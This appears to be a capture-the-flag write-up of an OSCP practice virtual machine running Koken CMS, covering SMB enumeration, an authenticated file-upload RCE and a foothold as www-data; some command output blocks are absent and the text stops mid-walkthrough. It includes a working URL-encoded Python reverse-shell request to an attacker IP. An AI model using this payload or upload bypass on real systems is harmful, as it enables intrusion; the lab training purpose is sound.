This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
File. Not zipped strangely, so it’s a 2.6Gb download as an ova file.
We’ve got four ports: SMB (139/445), HTTP on 80 and port 8000. If you guessed that’s a second HTTP port, you’re correct.
smbclient let me enumerate the shares, but didn’t seem to want to connect to the one we wanted:
But it’s okay, because impacket can help:
From these files, we get something immediately useful:
The page on port 8000 seems to be the most interesting one, and it’s running a CMS called Koken, which is seemingly designed for photographic content. Running searchsploit shows an Authenticed RCE for a version of it, so that may be what we’re after.
gives us a page called /admin that allows login; it wants an email address and a password. We try it with firstname.lastname@example.org:babygirl and we’re in.
Checking the searchsploit entry we find that after logging in we can upload PHP code in a file with a jpeg extension but then change the file extension in Burp Suite Repeater. So my request looks like this (sorry for the wall of text):
Then we go find that file and send it commands like this:
GET //storage//originals//93//9c//cmd.php?cmd=python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1
Which gets us a shell.
We’re on the box as www-data, but we can read the user flag from /home/daisa:
Well, we can get the database credentials from here: